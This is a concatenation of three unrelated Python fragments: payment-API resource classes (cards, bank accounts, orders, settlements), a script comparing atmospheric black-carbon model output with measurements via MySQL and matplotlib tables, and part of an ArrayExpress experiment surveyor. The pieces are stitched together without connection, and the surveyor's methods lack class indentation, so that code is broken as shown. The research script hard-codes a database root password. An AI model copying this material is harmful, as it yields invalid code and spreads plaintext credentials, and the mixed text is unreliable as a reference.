    A reversal of funds from a Credit.  A Credit can carry many Reversals up
    to its original amount; funds return to your Marketplace's escrow
    account in proportion to the Reversal amount.
    """

    type = 'reversals'
    uri_gen = wac.URIGen('/reversals', '{reversal}')
class FundingInstrument(Resource):
    """
    A source and/or destination of funds.  Use `debit` and `credit` to move
    money between the instrument and your Marketplace's escrow.
    """

    type = 'funding_instruments'

    def associate_to_customer(self, customer):
        """Attach this instrument to `customer` and persist the link."""
        try:
            self.links
        except AttributeError:
            # No links mapping yet -- start one.
            self.links = {}
        self.links['customer'] = utils.extract_href_from_object(customer)
        self.save()

    def debit(self, amount, **kwargs):
        """
        Pull `amount` from this instrument into marketplace escrow.

        :param appears_on_statement_as: if None, Balanced falls back to your
            Marketplace's `domain_name`.
        :rtype: Debit
        """
        return Debit(href=self.debits.href, amount=amount, **kwargs).save()

    def credit(self, amount, **kwargs):
        """
        Push `amount` from marketplace escrow to this instrument.

        :rtype: Credit
        """
        if not hasattr(self, 'credits'):
            raise exc.FundingSourceNotCreditable()
        return Credit(href=self.credits.href, amount=amount, **kwargs).save()
class BankAccount(FundingInstrument):
    """
    A funding instrument that is both a source and a destination of funds:
    Debits and Credits may be created against it.
    """

    type = 'bank_accounts'
    uri_gen = wac.URIGen('/bank_accounts', '{bank_account}')

    def verify(self):
        """
        Begin verification of this BankAccount so that verified operations
        (debits) become possible.

        :rtype: BankAccountVerification
        """
        return BankAccountVerification(
            href=self.bank_account_verifications.href).save()
class BankAccountVerification(Resource):
    """An attempt to verify a BankAccount for verified operations (debits)."""

    type = 'bank_account_verifications'

    def confirm(self, amount_1, amount_2):
        """Submit the two observed micro-deposit amounts and persist."""
        self.amount_1 = amount_1
        self.amount_2 = amount_2
        return self.save()
class Card(FundingInstrument):
    """A source of funds; Debits and CardHolds may be created against it."""

    type = 'cards'
    uri_gen = wac.URIGen('/cards', '{card}')

    def hold(self, amount, **kwargs):
        """Place a hold (authorization) of `amount` on this card."""
        return CardHold(href=self.card_holds.href, amount=amount,
                        **kwargs).save()
class Customer(Resource):
    """
    A person or business within your Marketplace.

    Customers are grouping constructs: many FundingInstruments (cards, bank
    accounts) and Transactions may be associated with one Customer.
    """

    type = 'customers'
    uri_gen = wac.URIGen('/customers', '{customer}')

    def create_order(self, **kwargs):
        """Open a new Order under this customer."""
        return Order(href=self.orders.href, **kwargs).save()

    @property
    def payable_account(self):
        """This customer's 'payable' Account, or None when absent."""
        payable_accounts = self.accounts.filter(type="payable")
        return payable_accounts.first()
class Order(Resource):
    """
    A logical grouping of Transactions with its own escrow balance.

    Any number of Transactions may attach to an Order so long as
    `amount_escrowed`, computed as
    (Debits - Refunds - Credits + Reversals), stays >= 0.
    """

    type = 'orders'
    uri_gen = wac.URIGen('/orders', '{order}')

    def credit_to(self, destination, amount, **kwargs):
        """Credit `amount` from this order's escrow to `destination`."""
        return destination.credit(order=self.href, amount=amount, **kwargs)

    def debit_from(self, source, amount, **kwargs):
        """Debit `amount` from `source` into this order's escrow."""
        return source.debit(order=self.href, amount=amount, **kwargs)
class Callback(Resource):
    """
    A publicly reachable URL that receives POSTed JSON whenever an Event is
    generated.
    """

    type = 'callbacks'
    uri_gen = wac.URIGen('/callbacks', '{callback}')
class Dispute(Resource):
    """
    Raised when a customer contests a transaction that occurred on their
    funding instrument.
    """

    type = 'disputes'
    uri_gen = wac.URIGen('/disputes', '{dispute}')
class Event(Resource):
    """
    A snapshot of another resource taken when something significant happened
    to it: creation, update, deletion, or another state change such as a
    Credit being marked failed.
    """

    type = 'events'
    uri_gen = wac.URIGen('/events', '{event}')
class EventCallback(Resource):
    """A single event being delivered to one callback."""

    type = 'event_callbacks'
class EventCallbackLog(Resource):
    """
    The request/response record of one attempt to notify a callback of an
    event.
    """

    type = 'event_callback_logs'
class ExternalAccount(FundingInstrument):
    """
    A source of funds provided by an external third-party processor.  Debits
    are permitted when `can_debit` is true.
    """

    type = 'external_accounts'
    uri_gen = wac.URIGen('/external_accounts', '{external_account}')
class Account(FundingInstrument):
    """
    Accumulates funds from multiple Orders in one place so they can later be
    credited out in bulk.
    """

    type = 'accounts'
    uri_gen = wac.URIGen('/accounts', '{account}')

    def settle(self, funding_instrument, **kwargs):
        """Move this account's balance out to `funding_instrument`."""
        return Settlement(href=self.settlements.href,
                          funding_instrument=funding_instrument,
                          **kwargs).save()
class Settlement(Transaction):
    """The movement of money out of an Account to a bank account."""

    type = 'settlements'
    # NOTE(review): the placeholder is '{settlements}' (plural), unlike the
    # singular pattern every other resource uses -- confirm before changing.
    uri_gen = wac.URIGen('/settlements', '{settlements}')
|
|
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
from pprint import pprint
from datetime import datetime
from datetime import timedelta
import mysql.connector
import pickle
import math
import calendar
from math import log10, floor
# --- Run configuration for the GEOS-Chem vs SP2 comparison tables ---
GC_error = True  # include GEOS-Chem relative error in the table cells
test_case = 'Van'#'default' #default, Van, wet_scav, no_bb, all_together
RH_of_interest = 90 #101 = no threshold
sig_figs_SP2 = 3  # significant figures for SP2 (measurement) cells
sig_figs_gc = 4  # significant figures for GEOS-Chem cells
def round_to_n(x, n):
    """Round x to n significant figures.

    Generalized over the original: zero is returned unchanged (it has no
    significant figures and log10(0) is undefined) and negative values are
    supported by taking the magnitude when locating the leading digit.
    Positive inputs behave exactly as before.

    :param x: numeric value to round
    :param n: number of significant figures to keep (n >= 1)
    :return: x rounded to n significant figures
    """
    if x == 0:
        return x
    # floor(log10(|x|)) is the power of ten of the leading digit; offset by
    # n-1 to keep exactly n significant digits.
    return round(x, -int(floor(log10(abs(x)))) + (n - 1))
#database connection
cnx = mysql.connector.connect(user='root', password='Suresh15', host='localhost', database='black_carbon')
cursor = cnx.cursor()

# Table 1: all clusters pooled.  Fetch the default-scenario rows (which
# include the SP2 measurement row) plus the test-case GEOS-Chem row.
data= []
red_list = []   # (row, col) table cells where GC is significantly above SP2
blue_list = []  # (row, col) table cells where GC is significantly below SP2
clusters = ['all','NPac','SPac','Cont','LRT']
GC_row_no = 2
cursor.execute(('SELECT 10th_percentile_mass_conc, 50th_percentile_mass_conc, 90th_percentile_mass_conc, mean_mass_conc, rel_err, data_source, test_scenario,cluster from whi_gc_and_sp2_stats_on_6h_clustered_ft_data where RH_threshold = %s and cluster = %s and test_scenario = %s '),(RH_of_interest,'all','default'))
data_raw = cursor.fetchall()
cursor.execute(('SELECT 10th_percentile_mass_conc, 50th_percentile_mass_conc, 90th_percentile_mass_conc, mean_mass_conc, rel_err, data_source, test_scenario,cluster from whi_gc_and_sp2_stats_on_6h_clustered_ft_data where RH_threshold = %s and cluster = %s and test_scenario = %s '),(RH_of_interest,'all',test_case))
wet_scav_data = cursor.fetchall()
data_raw.append(wet_scav_data[0])

# Unpack each DB row into SP2 / GC-default / GC-test-case stat variables.
for row in data_raw:
    data_source = row[5]
    case= row[6]
    if data_source == 'SP2':
        p10_sp2 = row[0]
        p50_sp2 = row[1]
        p90_sp2 = row[2]
        mean_sp2 = row[3]
        rel_err_sp2 = row[4]
    if data_source == 'GEOS-Chem' and case == 'default':
        p10_gc = row[0]
        p50_gc = row[1]
        p90_gc = row[2]
        mean_gc = row[3]
        if GC_error == True:
            rel_err_gc = row[4]
        else:
            rel_err_gc = 0
    if data_source == 'GEOS-Chem' and case == test_case:
        p10_gc_ws = row[0]
        p50_gc_ws = row[1]
        p90_gc_ws = row[2]
        mean_gc_ws = row[3]
        if GC_error == True:
            rel_err_gc_ws = row[4]
        else:
            rel_err_gc_ws = 0

# Build "value ± error" cell strings; GC cells also carry a (GC/SP2) ratio.
SP2_10 = str(round_to_n(p10_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(p10_sp2*rel_err_sp2,sig_figs_SP2))
SP2_50 = str(round_to_n(p50_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(p50_sp2*rel_err_sp2,sig_figs_SP2))
SP2_90 = str(round_to_n(p90_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(p90_sp2*rel_err_sp2,sig_figs_SP2))
SP2_mean = str(round_to_n(mean_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(mean_sp2*rel_err_sp2,sig_figs_SP2))
if GC_error == True:
    GC_10 = str(round_to_n(p10_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p10_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc/p10_sp2,3)) + ')'
    GC_50 = str(round_to_n(p50_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p50_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc/p50_sp2,3)) + ')'
    GC_90 = str(round_to_n(p90_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p90_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc/p90_sp2,3)) + ')'
    GC_mean = str(round_to_n(mean_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(mean_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc/mean_sp2,3)) + ')'
    GC_10_ws = str(round_to_n(p10_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p10_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc_ws/p10_sp2,3)) + ')'
    GC_50_ws = str(round_to_n(p50_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p50_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc_ws/p50_sp2,3)) + ')'
    GC_90_ws = str(round_to_n(p90_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p90_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc_ws/p90_sp2,3)) + ')'
    GC_mean_ws = str(round_to_n(mean_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(mean_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc_ws/mean_sp2,3)) + ')'
else:
    GC_10 = str(round_to_n(p10_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc/p10_sp2,3)) + ')'
    GC_50 = str(round_to_n(p50_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc/p50_sp2,3)) + ')'
    GC_90 = str(round_to_n(p90_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc/p90_sp2,3)) + ')'
    GC_mean = str(round_to_n(mean_gc,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc/mean_sp2,3)) + ')'
    GC_10_ws = str(round_to_n(p10_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc_ws/p10_sp2,3)) + ')'
    GC_50_ws = str(round_to_n(p50_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc_ws/p50_sp2,3)) + ')'
    GC_90_ws = str(round_to_n(p90_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc_ws/p90_sp2,3)) + ')'
    GC_mean_ws = str(round_to_n(mean_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc_ws/mean_sp2,3)) + ')'

# Flag cells whose GC error interval lies wholly above (red) or below
# (blue) the SP2 error interval; tuples index (table_row, table_col).
GC_list = [p10_gc, p50_gc, p90_gc, mean_gc]
GC_list_ws = [p10_gc_ws, p50_gc_ws, p90_gc_ws, mean_gc_ws]
SP2_list = [p10_sp2, p50_sp2, p90_sp2, mean_sp2]
i = 0
for value in GC_list:
    if (value - value*rel_err_gc) > (SP2_list[i]+ SP2_list[i]*rel_err_sp2):
        red_list.append((2,i+1))
    if (value + value*rel_err_gc) < (SP2_list[i]- SP2_list[i]*rel_err_sp2):
        blue_list.append((2,i+1))
    i+=1
i = 0
for value in GC_list_ws:
    if (value - value*rel_err_gc_ws) > (SP2_list[i]+ SP2_list[i]*rel_err_sp2):
        red_list.append((3,i+1))
    if (value + value*rel_err_gc_ws) < (SP2_list[i]- SP2_list[i]*rel_err_sp2):
        blue_list.append((3,i+1))
    i+=1

# Assemble the three table rows: measurement, GC default, GC test case.
table_row_SP2 = ['Measurement',SP2_10,SP2_50,SP2_90,SP2_mean]
table_row_GC = ['GEOS-Chem\ndefault scenario', GC_10,GC_50,GC_90,GC_mean]
table_row_GC_ws = ['GEOS-Chem\n' + str(test_case), GC_10_ws,GC_50_ws,GC_90_ws,GC_mean_ws]
data.append(table_row_SP2)
data.append(table_row_GC)
data.append(table_row_GC_ws)

# Render the table on an axis-less figure.
colLabels=('data source','10th ptile', '50th ptile', '90th ptile', 'mean')
fig=plt.figure()
ax = fig.add_subplot(111)
ax.axis('off')
#do the table
the_table = ax.table(cellText=data,
    colLabels=colLabels,
    loc='center')
table_props=the_table.properties()
table_cells=table_props['child_artists']
i=0
for cell in table_cells:
    ht = cell.get_height()
    wd = cell.get_width()
    cell.set_width(wd*1)
    cell.set_height(ht*2.2)
    cell.set_fontsize(14)
    #if i in [1,3,5,7]:
    #	cell.set_linewidth(4)
    i+=1
# Apply the significance colouring computed above to the cell text.
cellDict = the_table.get_celld()
for cell in red_list:
    cellDict[cell]._text.set_color('r')
for cell in blue_list:
    cellDict[cell]._text.set_color('b')

os.chdir('C:/Users/Sarah Hanna/Documents/Data/WHI long term record/GOES-Chem/')
plt.savefig('GC default v10 vs SP2 by cluster for WHI - ' + 'all' + ' - ' + str(RH_of_interest) + '% RH threshold - ' + str(test_case) + '.png',bbox_inches='tight')
plt.show()
#######################
# Table 2: same comparison but broken out per cluster -- one three-row
# group (Measurement / GC default / GC test case) per cluster.
data= []
red_list = []   # (row, col) cells where GC is significantly above SP2
blue_list = []  # (row, col) cells where GC is significantly below SP2
clusters = ['NPac','SPac','Cont','LRT']
GC_row_no = 2   # table row index of the first GC row for the current cluster
for cluster in clusters:
    cursor.execute(('SELECT 10th_percentile_mass_conc, 50th_percentile_mass_conc, 90th_percentile_mass_conc, mean_mass_conc, rel_err, data_source, test_scenario,cluster from whi_gc_and_sp2_stats_on_6h_clustered_ft_data where RH_threshold = %s and cluster = %s and test_scenario = %s '),(RH_of_interest,cluster,'default'))
    data_raw = cursor.fetchall()
    cursor.execute(('SELECT 10th_percentile_mass_conc, 50th_percentile_mass_conc, 90th_percentile_mass_conc, mean_mass_conc, rel_err, data_source, test_scenario,cluster from whi_gc_and_sp2_stats_on_6h_clustered_ft_data where RH_threshold = %s and cluster = %s and test_scenario = %s '),(RH_of_interest,cluster,test_case))
    wet_scav_data = cursor.fetchall()
    data_raw.append(wet_scav_data[0])
    pprint(data_raw)
    # Unpack each DB row into SP2 / GC-default / GC-test-case stat variables.
    for row in data_raw:
        print(row)
        data_source = row[5]
        case= row[6]
        if data_source == 'SP2':
            p10_sp2 = row[0]
            p50_sp2 = row[1]
            p90_sp2 = row[2]
            mean_sp2 = row[3]
            rel_err_sp2 = row[4]
        if data_source == 'GEOS-Chem' and case == 'default':
            p10_gc = row[0]
            p50_gc = row[1]
            p90_gc = row[2]
            mean_gc = row[3]
            if GC_error == True:
                rel_err_gc = row[4]
            else:
                rel_err_gc = 0
        if data_source == 'GEOS-Chem' and case == test_case:
            p10_gc_ws = row[0]
            p50_gc_ws = row[1]
            p90_gc_ws = row[2]
            mean_gc_ws = row[3]
            if GC_error == True:
                # BUG FIX: this previously assigned rel_err_gc, leaving
                # rel_err_gc_ws stale from the all-clusters table above, so
                # the test-case error bars and colouring used wrong values.
                rel_err_gc_ws = row[4]
            else:
                rel_err_gc_ws = 0
    # Build "value ± error" cell strings; GC cells also carry a (GC/SP2) ratio.
    SP2_10 = str(round_to_n(p10_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(p10_sp2*rel_err_sp2,sig_figs_SP2))
    SP2_50 = str(round_to_n(p50_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(p50_sp2*rel_err_sp2,sig_figs_SP2))
    SP2_90 = str(round_to_n(p90_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(p90_sp2*rel_err_sp2,sig_figs_SP2))
    SP2_mean = str(round_to_n(mean_sp2,sig_figs_SP2)) + u'\u00B1' + str(round_to_n(mean_sp2*rel_err_sp2,sig_figs_SP2))
    if GC_error == True:
        GC_10 = str(round_to_n(p10_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p10_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc/p10_sp2,3)) + ')'
        GC_50 = str(round_to_n(p50_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p50_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc/p50_sp2,3)) + ')'
        GC_90 = str(round_to_n(p90_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p90_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc/p90_sp2,3)) + ')'
        GC_mean = str(round_to_n(mean_gc,sig_figs_gc)) + u'\u00B1' + str(round_to_n(mean_gc*rel_err_gc,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc/mean_sp2,3)) + ')'
        GC_10_ws = str(round_to_n(p10_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p10_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc_ws/p10_sp2,3)) + ')'
        GC_50_ws = str(round_to_n(p50_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p50_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc_ws/p50_sp2,3)) + ')'
        GC_90_ws = str(round_to_n(p90_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(p90_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc_ws/p90_sp2,3)) + ')'
        GC_mean_ws = str(round_to_n(mean_gc_ws,sig_figs_gc)) + u'\u00B1' + str(round_to_n(mean_gc_ws*rel_err_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc_ws/mean_sp2,3)) + ')'
    else:
        GC_10 = str(round_to_n(p10_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc/p10_sp2,3)) + ')'
        GC_50 = str(round_to_n(p50_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc/p50_sp2,3)) + ')'
        GC_90 = str(round_to_n(p90_gc,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc/p90_sp2,3)) + ')'
        GC_mean = str(round_to_n(mean_gc,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc/mean_sp2,3)) + ')'
        GC_10_ws = str(round_to_n(p10_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p10_gc_ws/p10_sp2,3)) + ')'
        GC_50_ws = str(round_to_n(p50_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p50_gc_ws/p50_sp2,3)) + ')'
        GC_90_ws = str(round_to_n(p90_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(p90_gc_ws/p90_sp2,3)) + ')'
        GC_mean_ws = str(round_to_n(mean_gc_ws,sig_figs_gc)) + '\n(' + str(round_to_n(mean_gc_ws/mean_sp2,3)) + ')'
    # Flag cells whose GC error interval lies wholly above (red) or below
    # (blue) the SP2 interval; column offset is +2 for the cluster column.
    GC_list = [p10_gc, p50_gc, p90_gc, mean_gc]
    GC_list_ws = [p10_gc_ws, p50_gc_ws, p90_gc_ws, mean_gc_ws]
    SP2_list = [p10_sp2, p50_sp2, p90_sp2, mean_sp2]
    i = 0
    for value in GC_list:
        if (value - value*rel_err_gc) > (SP2_list[i]+ SP2_list[i]*rel_err_sp2):
            red_list.append((GC_row_no,i+2))
        if (value + value*rel_err_gc) < (SP2_list[i]- SP2_list[i]*rel_err_sp2):
            blue_list.append((GC_row_no,i+2))
        i+=1
    i = 0
    for value in GC_list_ws:
        if (value - value*rel_err_gc_ws) > (SP2_list[i]+ SP2_list[i]*rel_err_sp2):
            red_list.append((GC_row_no+1,i+2))
        if (value + value*rel_err_gc_ws) < (SP2_list[i]- SP2_list[i]*rel_err_sp2):
            blue_list.append((GC_row_no+1,i+2))
        i+=1
    table_row_SP2 = [cluster, 'Measurement',SP2_10,SP2_50,SP2_90,SP2_mean]
    table_row_GC = ['','GEOS-Chem\ndefault scenario', GC_10,GC_50,GC_90,GC_mean]
    table_row_GC_ws = ['','GEOS-Chem\n' + str(test_case), GC_10_ws,GC_50_ws,GC_90_ws,GC_mean_ws]
    data.append(table_row_SP2)
    data.append(table_row_GC)
    data.append(table_row_GC_ws)
    GC_row_no +=3
# Render the table on an axis-less figure.
colLabels=('cluster','data source','10th ptile', '50th ptile', '90th ptile', 'mean')
fig=plt.figure()
ax = fig.add_subplot(111)
ax.axis('off')
#do the table
the_table = ax.table(cellText=data,
    colLabels=colLabels,
    loc='center')
table_props=the_table.properties()
table_cells=table_props['child_artists']
i=0
for cell in table_cells:
    ht = cell.get_height()
    wd = cell.get_width()
    cell.set_width(wd*1.3)
    cell.set_height(ht*3)
    cell.set_fontsize(14)
    #if i in [1,3,5,7]:
    #	cell.set_linewidth(4)
    i+=1
# Apply the significance colouring computed above to the cell text.
cellDict = the_table.get_celld()
for cell in red_list:
    cellDict[cell]._text.set_color('r')
for cell in blue_list:
    cellDict[cell]._text.set_color('b')
os.chdir('C:/Users/Sarah Hanna/Documents/Data/WHI long term record/GOES-Chem/')
plt.savefig('GC default v10 vs SP2 by cluster for WHI - ' + 'by cluster' + ' - ' + str(RH_of_interest) + '% RH threshold - '+str(test_case)+'.png',bbox_inches='tight')
plt.show()
cnx.close()
|
|
import requests
from django.utils.dateparse import parse_datetime
from typing import List, Dict
from data_refinery_common.job_lookup import ProcessorPipeline, Downloaders
from data_refinery_common.logging import get_and_configure_logger
from data_refinery_common.models import (
Experiment,
ExperimentAnnotation,
ExperimentOrganismAssociation,
ExperimentSampleAssociation,
Organism,
OriginalFile,
OriginalFileSampleAssociation,
Sample,
SampleAnnotation,
SurveyJobKeyValue,
)
from data_refinery_common.utils import (
get_normalized_platform,
get_readable_affymetrix_names,
get_supported_microarray_platforms,
)
from data_refinery_foreman.surveyor import harmony, utils
from data_refinery_foreman.surveyor.external_source import ExternalSourceSurveyor
logger = get_and_configure_logger(__name__)

# ArrayExpress JSON API endpoints; SAMPLES_URL is filled in with an
# experiment accession code.
EXPERIMENTS_URL = "https://www.ebi.ac.uk/arrayexpress/json/v3/experiments/"
SAMPLES_URL = EXPERIMENTS_URL + "{}/samples"
# Sentinel used when a platform/manufacturer cannot be determined up front.
UNKNOWN = "UNKNOWN"
class UnsupportedPlatformException(Exception):
    """Raised when an experiment was run on a platform we cannot process."""
class ArrayExpressSurveyor(ExternalSourceSurveyor):
def source_type(self):
    """Identify this surveyor's downloader type (ARRAY_EXPRESS)."""
    return Downloaders.ARRAY_EXPRESS.value
def create_experiment_from_api(self, experiment_accession_code: str) -> (Experiment, Dict):
    """Given an experiment accession code, create an Experiment object.

    Also returns a dictionary of additional information about the
    platform discovered for the experiment.

    Will raise an UnsupportedPlatformException if this experiment was
    conducted using a platform which we don't support.

    See an example at: https://www.ebi.ac.uk/arrayexpress/json/v3/experiments/E-MTAB-3050/sample
    """
    request_url = EXPERIMENTS_URL + experiment_accession_code
    experiment_request = utils.requests_retry_session().get(request_url, timeout=60)

    try:
        parsed_json = experiment_request.json()["experiments"]["experiment"][0]
    except KeyError:
        # Payload did not have the experiments/experiment structure at all.
        logger.error("Remote experiment has no Experiment data!",
                     experiment_accession_code=experiment_accession_code,
                     survey_job=self.survey_job.id)
        raise

    experiment = {}
    experiment["name"] = parsed_json["name"]
    experiment["experiment_accession_code"] = experiment_accession_code

    # This experiment has no platform at all, and is therefore useless.
    if 'arraydesign' not in parsed_json or len(parsed_json["arraydesign"]) == 0:
        logger.warn("Remote experiment has no arraydesign listed.",
                    experiment_accession_code=experiment_accession_code,
                    survey_job=self.survey_job.id)
        raise UnsupportedPlatformException
    # If there is more than one arraydesign listed in the experiment
    # then there is no other way to determine which array was used
    # for which sample other than looking at the header of the CEL
    # file. That obviously cannot happen until the CEL file has been
    # downloaded so we can just mark it as UNKNOWN and let the
    # downloader inspect the downloaded file to determine the
    # array then.
    elif len(parsed_json["arraydesign"]) != 1 or "accession" not in parsed_json["arraydesign"][0]:
        experiment["platform_accession_code"] = UNKNOWN
        experiment["platform_accession_name"] = UNKNOWN
        experiment["manufacturer"] = UNKNOWN
    else:
        # Exactly one arraydesign: try to match it to a supported platform.
        external_accession = parsed_json["arraydesign"][0]["accession"]
        for platform in get_supported_microarray_platforms():
            if platform["external_accession"] == external_accession:
                experiment["platform_accession_code"] = get_normalized_platform(platform["platform_accession"])
                # Illumina appears in the accession codes for
                # platforms manufactured by Illumina
                if "ILLUMINA" in experiment["platform_accession_code"].upper():
                    experiment["manufacturer"] = "ILLUMINA"
                    experiment["platform_accession_name"] = platform["platform_accession"]
                else:
                    # It's not Illumina, the only other supported Microarray platform is
                    # Affy. As our list of supported platforms grows this logic will
                    # need to get more sophisticated.
                    experiment["manufacturer"] = "AFFYMETRIX"
                    platform_mapping = get_readable_affymetrix_names()
                    experiment["platform_accession_name"] = platform_mapping[
                        platform["platform_accession"]]

        if "platform_accession_code" not in experiment:
            # We don't know what platform this accession corresponds to.
            experiment["platform_accession_code"] = external_accession
            experiment["platform_accession_name"] = UNKNOWN
            experiment["manufacturer"] = UNKNOWN

    experiment["release_date"] = parsed_json["releasedate"]

    if "lastupdatedate" in parsed_json:
        experiment["last_update_date"] = parsed_json["lastupdatedate"]
    else:
        # Fall back to the release date when AE gives no update date.
        experiment["last_update_date"] = parsed_json["releasedate"]

    # Create the experiment object
    try:
        experiment_object = Experiment.objects.get(accession_code=experiment_accession_code)
        logger.debug("Experiment already exists, skipping object creation.",
                     experiment_accession_code=experiment_accession_code,
                     survey_job=self.survey_job.id)
    except Experiment.DoesNotExist:
        # We aren't sure these fields will be populated, or how many there will be.
        # Try to join them all together, or set a sensible default.
        experiment_descripton = ""
        if "description" in parsed_json and len(parsed_json["description"]) > 0:
            for description_item in parsed_json["description"]:
                if "text" in description_item:
                    experiment_descripton = experiment_descripton + description_item["text"] + "\n"
        if experiment_descripton == "":
            experiment_descripton = "Description not available.\n"

        experiment_object = Experiment()
        experiment_object.accession_code = experiment_accession_code
        experiment_object.source_url = request_url
        experiment_object.source_database = "ARRAY_EXPRESS"
        experiment_object.title = parsed_json["name"]
        # This will need to be updated if we ever use Array
        # Express to get other kinds of data.
        experiment_object.technology = "MICROARRAY"
        experiment_object.description = experiment_descripton
        experiment_object.source_first_published = parse_datetime(experiment["release_date"])
        experiment_object.source_last_modified = parse_datetime(experiment["last_update_date"])
        experiment_object.save()

        # Store the raw API payload as a non-CCDL annotation.
        json_xa = ExperimentAnnotation()
        json_xa.experiment = experiment_object
        json_xa.data = parsed_json
        json_xa.is_ccdl = False
        json_xa.save()

        ## Fetch and parse the IDF/SDRF file for any other fields
        IDF_URL_TEMPLATE = "https://www.ebi.ac.uk/arrayexpress/files/{code}/{code}.idf.txt"
        idf_url = IDF_URL_TEMPLATE.format(code=experiment_accession_code)
        idf_text = utils.requests_retry_session().get(idf_url, timeout=60).text

        # IDF is tab-separated "key<TAB>value[<TAB>value...]" lines; a key
        # with multiple values becomes a list.
        lines = idf_text.split('\n')
        idf_dict = {}
        for line in lines:
            keyval = line.strip().split('\t')
            if len(keyval) == 2:
                idf_dict[keyval[0]] = keyval[1]
            elif len(keyval) > 2:
                idf_dict[keyval[0]] = keyval[1:]

        # Store the parsed IDF as a second annotation.
        idf_xa = ExperimentAnnotation()
        idf_xa.data = idf_dict
        idf_xa.experiment = experiment_object
        idf_xa.is_ccdl = False
        idf_xa.save()

        if 'Investigation Title' in idf_dict:
            experiment_object.title = idf_dict['Investigation Title']
        if 'Person Affiliation' in idf_dict:
            # This is very rare, ex: E-MEXP-32
            if isinstance(idf_dict['Person Affiliation'], list):
                unique_people = list(set(idf_dict['Person Affiliation']))
                experiment_object.submitter_institution = ", ".join(unique_people)[:255]
            else:
                experiment_object.submitter_institution = idf_dict['Person Affiliation']

        # Get protocol_description from "<experiment_url>/protocols"
        # instead of from idf_dict, because the former provides more
        # details.
        protocol_url = request_url + '/protocols'
        protocol_request = utils.requests_retry_session().get(protocol_url, timeout=60)
        try:
            experiment_object.protocol_description = protocol_request.json()['protocols']
        except KeyError:
            logger.warning("Remote experiment has no protocol data!",
                           experiment_accession_code=experiment_accession_code,
                           survey_job=self.survey_job.id)

        if 'Publication Title' in idf_dict:
            # This will happen for some superseries.
            # Ex: E-GEOD-29536
            # Assume most recent is "best:, store the rest in experiment annotation.
            if isinstance(idf_dict['Publication Title'], list):
                experiment_object.publication_title = "; ".join(idf_dict['Publication Title'])
            else:
                experiment_object.publication_title = idf_dict['Publication Title']
            experiment_object.has_publication = True
        if 'Publication DOI' in idf_dict:
            if isinstance(idf_dict['Publication DOI'], list):
                experiment_object.publication_doi = ", ".join(idf_dict['Publication DOI'])
            else:
                experiment_object.publication_doi = idf_dict['Publication DOI']
            experiment_object.has_publication = True
        if 'PubMed ID' in idf_dict:
            if isinstance(idf_dict['PubMed ID'], list):
                experiment_object.pubmed_id = ", ".join(idf_dict['PubMed ID'])
            else:
                experiment_object.pubmed_id = idf_dict['PubMed ID']
            experiment_object.has_publication = True

        # Scrape publication title and authorship from Pubmed
        if experiment_object.pubmed_id:
            pubmed_metadata = utils.get_title_and_authors_for_pubmed_id(experiment_object.pubmed_id)
            experiment_object.publication_title = pubmed_metadata[0]
            experiment_object.publication_authors = pubmed_metadata[1]

        experiment_object.save()

    # Surface the platform decision to the caller alongside the experiment.
    platform_dict = {}
